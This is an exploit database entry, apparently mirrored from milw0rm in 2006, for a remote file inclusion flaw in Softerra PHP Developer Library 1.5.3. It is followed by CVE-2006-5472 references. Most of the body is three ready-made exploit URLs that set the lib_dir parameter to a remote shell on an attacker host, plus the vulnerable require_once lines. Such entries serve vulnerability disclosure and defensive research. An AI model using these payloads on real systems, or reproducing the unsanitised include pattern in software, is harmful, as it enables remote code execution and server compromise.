Lucene search
MPEDB-ID:2520HistoryOct 12, 2006 - 12:00 a.m.
Softerra PHP Developer Library 1.5.3 - Remote File Inclusion
2006-10-1200:00:00
MP
www.exploit-db.com
25
AI Score
7.4
Confidence
Low
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
# #
# [ Softerra. PHP Developer Library ] #
#
# Class: Remote File Include Vulnerability #
# Patch: Unavailable #
# Published 2006/10/12 #
# Remote: Yes
# Local: No #
# Type: High #
# Site: http://www.softerra.com/products_php-library.htm #
# Author: MP
# Contact: [email protected] #
# #
#################################################################
Exploit:
http://softerraphpdeveloper.com/PHPLibrary-1.5.3/lib/registry.lib.php?lib_dir=http://attacker.com/shell?
http://softerraphpdeveloper.com/PHPLibrary-1.5.3/lib/sqlcompose.lib.php?lib_dir=http://attacker.com/shell?
http://softerraphpdeveloper.com/PHPLibrary-1.5.3/lib/sqlsearch.lib.php?lib_dir=http://attacker.com/shell?
Vuln Files:
registry.lib.php
sqlcompose.lib.php
sqlsearch.lib.php
Vuln Code:
#
../lib/registry.lib.php
<? ...
require_once ($lib_dir . "sqlstorage.class.php");
... ?>
##
../lib/sqlcompose.lib.php
<? ...
require_once ($lib_dir . "array.lib.php");
... ?>
##
../lib/sqlsearch.lib.php
<? ...
require_once ($lib_dir . "array.lib.php");
... ?>
# milw0rm.com [2006-10-12]Related
cvelist
cvelist
CVE-2006-5472
2006-10-24 20:00:00
nvd
nvd
CVE-2006-5472
2006-10-24 20:07:00
cve
cve
CVE-2006-5472
2006-10-24 20:07:00